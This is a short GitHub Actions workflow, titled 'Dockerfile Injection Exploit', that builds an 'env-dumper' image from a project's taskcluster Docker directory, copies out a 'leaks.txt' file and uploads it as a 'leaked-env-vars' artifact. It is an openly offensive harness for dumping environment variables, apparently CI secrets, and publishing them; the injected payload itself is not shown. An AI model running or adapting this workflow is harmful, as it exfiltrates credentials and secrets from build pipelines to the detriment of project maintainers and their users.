name: Dockerfile Injection Exploit

on: [push]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v3

      - name: Build image with leaked env vars
        run: |
          docker build \
            --build-arg PYTHON_VERSION='3.11' \
            -t env-dumper \
            ./taskcluster/docker/python
          docker run --rm -v ${{ github.workspace }}:/output env-dumper cp /leaks.txt /output/leaks.txt

      - name: Upload leaked data
        uses: actions/upload-artifact@v3.1.3
        with:
          name: leaked-env-vars
          path: leaks.txt
